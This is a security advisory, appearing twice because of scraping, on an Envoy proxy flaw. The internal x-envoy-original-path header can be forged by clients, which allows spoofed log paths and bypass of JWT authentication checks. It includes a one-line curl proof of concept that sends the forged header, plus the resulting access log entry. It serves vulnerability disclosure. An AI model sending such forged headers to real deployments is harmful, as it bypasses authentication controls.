Impact
Bypass JWT checks, forge fake original paths.
Affected components
Trace logs, gRPC logs, JWT filter.
Attack vector/s
The header x-envoy-original-path should be an internal header, but Envoy does not remove this header from the request at the beginning of request processing when it is sent from an untrusted client.
The faked header would then be used for trace logs and grpc logs, as well as used in the URL used for jwt_authn checks if the jwt_authn filter is used, and any other upstream use of the x-envoy-original-path header.
Description
Trusted x-envoy-original-path header can be forged by attackers
Example exploit or proof-of-concept
Client request:
$ curl -H "x-envoy-original-path: /fake" http://localhost:8080/real-path/
Access log, using the default log format:
[2023-02-28T19:26:53.660Z] "GET /fake HTTP/1.1" 200 - 0 3257 1 0 "-" "curl/7.82.0" "36174006-b793-4e40-8a38-a3d17a2a37a0" "localhost:8080" "172.18.98.50:8020"
mkauf Finder
phlax Coordinator
cancecen Coordinator
alyssawilk Analyst
Impact
Bypass JWT checks, forge fake original paths.
Affected components
Trace logs, gRPC logs, JWT filter.
Attack vector/s
The header
x-envoy-original-pathshould be an internal header, but Envoy does not remove this header from the request at the beginning of request processing when it is sent from an untrusted client.The faked header would then be used for trace logs and grpc logs, as well as used in the URL used for
jwt_authnchecks if thejwt_authnfilter is used, and any other upstream use of the x-envoy-original-path header.Description
Trusted
x-envoy-original-pathheader can be forged by attackersExample exploit or proof-of-concept
Client request:
$ curl -H "x-envoy-original-path: /fake" http://localhost:8080/real-path/Access log, using the default log format:
[2023-02-28T19:26:53.660Z] "GET /fake HTTP/1.1" 200 - 0 3257 1 0 "-" "curl/7.82.0" "36174006-b793-4e40-8a38-a3d17a2a37a0" "localhost:8080" "172.18.98.50:8020"